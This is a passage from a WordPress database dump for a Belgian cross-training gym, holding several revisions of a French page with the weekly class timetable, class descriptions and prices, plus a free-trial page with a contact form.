(276, 1, '2013-07-03 20:45:08', '2013-07-03 20:45:08', 'Venez découvrir les bienfaits du cross training lors d\'une première séance gratuite.\r\n\r\n[contact-form-7 id=\"265\" title=\"Seance_gratuite\"]', 'Séance gratuite', '', 'inherit', 'open', 'open', '', '266-revision-v1', '', '', '2013-07-03 20:45:08', '2013-07-03 20:45:08', '', 266, 'http://www.crosstrainingcenter.be/?p=276', 0, 'revision', '', 0),
(277, 1, '2013-07-03 20:48:13', '2013-07-03 20:48:13', '<h1>Une séance gratuite?</h1>\r\nEnvie de découvrir les bienfaits du cross training?\r\nNous vous offrons gratuitement une première séance.\r\nRemplissez le formulaire ci-dessous et nous vous recontacterons pour planifier avec vous votre première séance. \r\n\r\n[contact-form-7 id=\"265\" title=\"Seance_gratuite\"]', 'Séance gratuite', '', 'inherit', 'open', 'open', '', '266-revision-v1', '', '', '2013-07-03 20:48:13', '2013-07-03 20:48:13', '', 266, 'http://www.crosstrainingcenter.be/?p=277', 0, 'revision', '', 0),
(317, 1, '2013-07-04 16:35:10', '2013-07-04 16:35:10', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>&nbsp;</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>&nbsp;</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>&nbsp;</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>&nbsp;</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-04 16:35:10', '2013-07-04 16:35:10', '', 11, 'http://www.crosstrainingcenter.be/11-revision-104/', 0, 'revision', '', 0),
(278, 1, '2013-07-03 20:45:06', '2013-07-03 20:45:06', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>_</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>_</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>_</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>_</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 20:45:06', '2013-07-03 20:45:06', '', 11, 'http://www.crosstrainingcenter.be/?p=278', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(279, 1, '2013-07-03 21:04:43', '2013-07-03 21:04:43', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>_</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>_</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>_</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>_</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 21:04:43', '2013-07-03 21:04:43', '', 11, 'http://www.crosstrainingcenter.be/?p=279', 0, 'revision', '', 0),
(321, 1, '2013-07-10 15:43:05', '2013-07-10 15:43:05', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>&nbsp;</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>&nbsp;</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>&nbsp;</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>&nbsp;</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-10 15:43:05', '2013-07-10 15:43:05', '', 11, 'http://www.crosstrainingcenter.be/11-revision-108/', 0, 'revision', '', 0),
(280, 1, '2013-07-04 16:23:57', '2013-07-04 16:23:57', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">X</td>\r\n<td class=\"tcellule\">X</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">X</td>\r\n<td class=\"tcellule\">X</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">X</td>\r\n<td class=\"tcellule\">X</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">X</td>\r\n<td class=\"tcellule\">X</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids 